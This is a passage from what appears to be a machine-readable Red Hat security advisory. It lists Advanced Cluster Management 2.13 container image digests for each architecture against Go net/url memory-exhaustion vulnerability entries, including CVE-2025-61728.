"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:8243cc9646e4ae89aabf299e476a94124c8244dd54e0fb1c848a6bbbd0c94f62_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:2a64ce4183df6c5743ffa7df7b4192fce192e08eea5e03b76c9b621e5d351d2a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:4e6dd9d24ab247b2a7b84f7842b2a710eee3aa2fce58fc1516ef5bb55e0693f0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:d814b3c076f9ef671d74e156dce5d3f634130904f166a6a04a59df41e8ec07ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:faeaa0d157334dcf9a808ea8916272c9912726580dc0ca06b6e3bb85860772ab_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:2bc6310bd61774d74b1dd0245139b3bfc4940efb1bf424ad0e7a4d822f2271b8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:95baf4ac24b7c9d2fb2883cdf81c7d75f76c8c53aef6745eb732918718877cd4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c17ac85849d3cdf437d09d8ce9581b48a73304498a315db470ec655fdb88f529_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f6dcad139d0a85137a293dd7cf8c68819658d71a1a45914030cfb7d58dac146d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:1ef6867542269af4ce8cee7225dfb4e64680715a1bb34ed510b9fbf84d88fb2d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:58a418395bf71e339145d259b6906172fbc066e17e05071ce983c5615e703075_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:81f72d7522fcc4a0e948e52987671328dcbfd726b54125a23d893cd45e6cbdd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:f4ad6f2ed37be694b95b1c00b32f797cc29a0dab790207a254b4d4f4f2aa7158_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:723dd5b7b166ed9fcedd2f6b2b2567e943ffcfa78bfe7974ac410d629495bc27_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:7f20f9bb4a9b57b618fd864fd49ef0b1a1cb81d20668ba9f1bb2392086d7a144_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b3b5013c3333ed731561416060e14930f276336fb23037c6a7109496faee095e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ccc5e9181f23112628ee91c9acc577627a501af9bb170b2bf0eb0837811e7328_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:0bd1b50f01e6228c56cf07c005ac8ead15d814b09813157b79fcea9292e42551_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:82107bc3ac83308ba96111cc5690a23d116bcd71c7a65face89e4d530b2e8382_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a673e83cb652160fc3db1b69505d21a634a15fcc68f3940bda25f64dc0ae7bb6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a765f440d03be4c90a764f6ec1a2bf2d4c4acb0f8af630aff9811aaa631327ca_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:e8b775e29dbba36821b79231e35017cefd5bb6d245dd1c2d8004150c4998a89c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eaa602fc272af9fce6ea4b2b2e700e24fc29b7fcaad3437abc73f247a5f994aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:ef6cd34e8f03c566dea492474495c0142a506b973b1a1ae00667de2993c88209_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:fbf35da688ccf2c7049320cee23dcbc518d2787d52c78574ff44e481a38ec20f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:38a4caea83181ce3f04956654ed3e2241a4563718a66ddf09eb0997afe47e0ce_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:54d57a40c0ebc2b7922552aff95b6219c10c4f1b27627d36bc800c1db33a4651_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:8fb71c30e1217f0697c872db2bafbb5e06a7f727c6b508f269512447d6b5118d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:e58abdba80628700eaf2736cb65e6746d2b2126cc7b19ba403c19be5e8a22509_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:83bc597e83bd0756afa67adcbd50858b0d1c23f87b572706e9059dd26055b4a0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:a5ccbff1ad0a3001902044e52590ee18508632bce7822ebf54ba521eaae180eb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:db8ed91f54d683d9d3be3b0747f7429eb95accc8802593dd61d8c24e8a1facfb_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:f3d2daf907e6fd32654d1458c60b134f4d938a933e53161e588bcd94ff6b01df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:0aa9df5f5bf523f7d6d4a9e931a1932e62056d942bf86396d33874adc85a91e8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:4d0252b36a0ca8f522e60e400463b22de506766bdf0c1f65e3e289a3c93002d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:701bc2dd0a441216ea138b677dbf71d497d9b7acaad5f48661117008a8e5defe_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:b30887b0c8fb4292b6c87ef681761c18a112e0113647e2bde86c04c13f59b7a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6b65f79a765b69a84ac5924280e9f6d55875b8aceb6ae97f9a75cb6076bd074a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6d410e7e4de91970f44368e5cc1ce1ac83908550785263342f6038a988be30e4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:736631a4d89bf44078b7f180ddcd474655d66ed43b85a4a79258eab9348656ff_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:ca58b27ea6673f0c506ed1ffad51918608a813dabf58f4845ab97d6e9f2c11d3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:21f6d86d21be3a9541fc577a647d8f38b81bca975dc82d9506056f44e6a35443_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:60a3e7e83d189003d185e2415f96b4f3be0912e4cbaa96ea4ed8ebcdce5cc1d0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:796abebd9573cacba87eb0c6497ed9617047eddba90f1c4b8237964ed954328d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:d130f2bb5b047483504d5c8113e0449983e79c49e8bda97b5752862930a91947_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:0a98f4d3e54b7410bfc1601f2ee2ba1308f30e40314bfc5169c3d99c3b8dfaa1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:3148a9662d732bbad15d6bd89cce43a886cba68ba1cefcef55f7bb65d3159432_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33c37b7bd401cfcf46d5cb42173fe3697a0649dc1080255dbd6243d4bfe8d08f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:cf1c1c1c778cafe6067df490969aab89a6b3e43487d954bb24b1409bc22f1091_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:118fe4fc31cb7818cda240c48628e5a3d43002c271fa7ba45d9631b7a6ddb8e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a2e5353298e0b0e46516d5127d0da65fcb5ac4498651693f347de1eb18e12095_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b10f9f52f0665ae2a8bb4bf2649aa6e3d1185a0dffb9ebeb11a8900174df5ef2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:c2bfb459d7442878d591cc31436830b983fe30dcfa6f7d383cc91cb32e42fa7c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:55320965b17fef48e776d39c548f0bf81a1e9239ee4b90a032f4b111e8748d2f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:a36bcef862d0e3cc972c9eb2c0d80311030659c13de6acab7e353905ff5eccff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:c7bfe530a7efe66f5c3e2e08b114b3b9e44072e3609725663d6a5f3945bda512_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:e73d91e157c13ea96615fc060f5312997203f6b6350d335917b2feacb96c9ca5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2003587575e18b2e6b9bf3617c65e0f83ebc8cf30daf6dd241500cd1555820e0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:6098254a7e2fdd67ef1773abda74d3dde3d31e59254f4a1cd5e77dc34d224602_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:7fa35da009ab6e41177f0589f6d3fbf1bbe3fff4b52add3bfbc516a046e35640_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:9418993b725bf813959ed5adbd21690ee2cbeeac3d56c7ab6805c3eb29b5d46f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:14fb16412dea57a775e95954c3a07a77de846f851935629bf9bfdbcc46a70f4f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:40f8ad6430cc767b56992722d5890f98882c7372950320d28e808c18714b7179_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:c227f25ae401af3eba9352765f906c8b873370485a7c748b1602e53c0776f90f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:ffb3e3cd6764e802b5e9f87034548f96dcacfeedd8fe2b3b21b06c41734e8320_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:24df1e0d7850220df3aa658c6056f81a68fe451ffd99e4d0dfee07cebe9c3782_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:25fb42a78847235c61e35f66a6e02dfee5fc0b6832aa4ce06c3c6f395b95b36d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9e19fc6fd3285c1833cd97eeef10cb179fe9705dea9b3f912052207b3a2daea7_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:edc8b960038279c012c5aa99917361ad0888b0195c3ee9adb368b798a5bea2fb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:231caddbaa1b499fae4efbf34c839941e595f242d12e22378e210b47de6262a8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:450199903a5d88d10b107768839780fbd0ee15535c6a998a0cac5bec942dd414_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:7fe0726987e478ed3da6d9b1eb4b611461e285ada827de6a186b95bc75a36c73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:8d8eb1e5a21a37f041f60fbd624c7861f2e726997c6ad1d5279f59a7c849f2af_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1628ce0aab57c09dad7f5b2a24bf664de71b76a38cd05ccf281bb8cc8fc5859e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e3f01077df87eb91ece7c2bd6cfa2c15a0044c2f9c40efee9ce1bf14a6807b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9bc74577f0edc3045a1a027c0f8652cc904fc3b9397dc9af10576f9dfcab2080_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:e9cab985b52c8f23b62cad3ea9c692e321a5347bd06fc56b19dfdb1801030567_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:01778cb2a2b9771a03ed8c7feb5b94a23225f60f4e49263e71dccd017cfd1164_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:0e4525617200428a5510108b0a0845fde43fd4e64804186af045df9680ca05b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:903c920eb068fcabdd16fb95f78902107892efa8e8a1ddda124d7f6bc1afdcd8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:ac486bf6a84c573a9774aadd4ea995a551c0abcbfb42dbbb71dc03e6c900a211_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:61b112b8ebb2ca4e41f5ee4b0c09ad0b53c3a6b60297fb8c1f158c28a8f10b3d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:6bd79f2c4c516adc626c73dec28892cbeab65e349dff8f1fcb11d7242b614805_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:c920a77dcf02347d116035d5cfef1a365e02022713788a14045a9be2a1bd1c5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:eb7788d29142ad36cba099b1dcebe3eb1c28366f87f611ca4d0b375bc7f4b19d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5b7668d6f3b7fb994c4bbbb86bdb92d4258b88ab92337394b66058255c048ad8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:64930ec82f003294eaf26f6ac59c493e1bfc8c3d7addeb4c5b8f0cfcf458c406_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:753415fcdcc9f6b8685a54d83f4d35d1104d690215125a36d6df2b9873ac6cd3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:c58049e17034c0df635df55fce49cab392af3194f57c03bbb842d7c2acb247e5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0907a51a72f39393da4bdee241333b08b5b5591f1e9a5de7d67ad586d11da59b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:498cdf1888c2ef9f031baafc288323ebd0fe5d9b009cedb1443605cf4153c0c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5ac47e52a78f31b8982de5b9144ec96baab80c78ba8d06d3efabda329e017d36_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:9819517abcb75b516ea0e158ad9cbb0a4ef847f7858531b751c04de5a53527be_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:2ae0730de393d5aeff08a9317fc70459421dd8d6fc7a65f2a9e4a28ae5b64d9d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:62c7b78b2726fd940db4bd435b13f6d07097395b069130b32ea0912c95333555_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8c986374ff8afd980f450877facc2927fdd6f655f3d6b7def6771485d00afeb1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8eeb6a344b773bdc4f50da36c956dbaa50d6474f5c045e92250274d0ed723b39_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:1d7f37fa0146f48291fd1dd12752d0a19c8e87c30e1698492b36274c79051a9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:5c3cc196a8638f6fae7c246ff6746f2f453bbfab8e018683ee297609713664ac_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:e539ec4ab10e81c08d68991e3c77efd43497f4a5561ee1315ff8d467736d245a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:fbc20e8545d4562d05df98d5cfbc91a7a2d802a9d4ff8c0ea733126687c42c26_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:111bbc8fda153d16c384a622dd659c53b8cdc47e495a9fada411a5042954ab6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:433f0b3d09889613d5214ba1c084bdc99bdcbce227fefd10b0d8491442698ea9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:51096baed7d6ed403d88ac2dd935a30313f618b7552fee2b07367db5069601d1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:b3eefeffd90660b8e463f2b06dc5ee2b46e235efae7c13ed893828a6c9598459_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:58a8acff99aaaacdb7c292b615c2ed9a0418d82f75273c1809a6db05811713fa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:661a4a1fb71f36ac1663232ca6e098d1c101dc16168eec7eee471ae11f98f66c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bc06192ce81eac533cb7c080e8aef6587991534cb9b1787537c49753c0985e3d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:e8207895ec9e7006746043cf04fbf1e2897aa30e74b9184665be2ac50f9fe650_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:3074a430dd8bbb0399ce649186cb6140d8525e5b7c1e05b79a4ab74a32d989b8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:34de933b36ee01444cdf4d4a45e47466ef8dad6ab6345134524595c191928ffe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:8a65d646180c7889d0ba1e3a11fd6796d0020301e4e721575f87585afd8f9dfe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:cf1b6cae5a10aec88554e71be094737b0a17efb07cd1175ca55f1799626f58f2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:036ee3882d4d6536c309d9aacea3dc611785deba3bd998092adcb1ba21664897_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:82914e82513e2f8522589886a5df6681d12c6442ff1b8ef05a21d31c09fa0f0d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:893831b7270214137b2fdf1e55f0175b4ef6de9b8763eaaf0e0a935c8ab1744d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d6e329af2d9c1648006e3fa0b0232562a2bed6e7a33c56e025517f7d9068b5cc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:131918c9878d040c3ec190a9c724a65dbf3bb27f55a0fcac250d92067dc69288_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:327af8db145b9bd6ada1c9f27faa493ce090af412c51dedd7b247e65dcad51fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:721ebc57b91b4f9bcfb25d7b29ee8a2ca60fcb231096af2812f9201778e3ca51_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:ebff3dd368f33d1aec215b947b88f4aa7e821db1577d448b8c6eb4e6ead7fe07_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:6a88ce891e0fc9619e983a5b63fef86f735b8df5eb56909075bd3bbb098dddf8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:7485348cced991c7a4399e21e077ed62b3a118b7093bd4f42f9863d9e0da5c26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:b8d70910405eec4d886b27fc348a982c0b6f906f7f0e65aceecffd9f09fd6602_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:e63891386bfb191cd0e74884cad1f86c462d57e51b9aeec7d9c5073ba4d723f9_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "golang: net/url: Memory exhaustion in query parameter parsing in net/url"
},
{
"cve": "CVE-2025-61728",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-28T20:01:39.965024+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:01382838a23f75a6c03b30c68e9e42d72c22d773a4891260c639f7c8b60ffd87_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:1c74aaa66b6be9f5eb1f55851f1cc3f2a3878882c3fc972cd24232e9022f74e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:696d1f7c4b5415e49760f7a66368aa0260284b12b108d5feb560838a9bce8a6f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7328602aa637f1b555ecd56c05d6ade8dbee48fae78a0118b1e39774b8383704_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:3ae25beb920ec77de14769895f60da6a3d83fc41192ca5da5f976076853e5a50_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:c9bf774dfa3f5a66339a86f22961c54b2b41199efd173b016a2c7c57407dae40_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:d1cac9d50ec20e770ae41aa8f90474c269d80e84a9990e2c3e613a892b0c044c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:ddb5d8c476bcc9b6d4a7c0d116a2f5150acbfa80cc890d77d5d90bd496a7860e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:0ffd5a902860aad15377e20b1e6481e6cf746fa3e33509df0f88f93f9a9f8034_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:abcf4d6f42dec254d8b4197282fb449daf13d4724ed23ddc2aafde0328338f74_ppc64le",
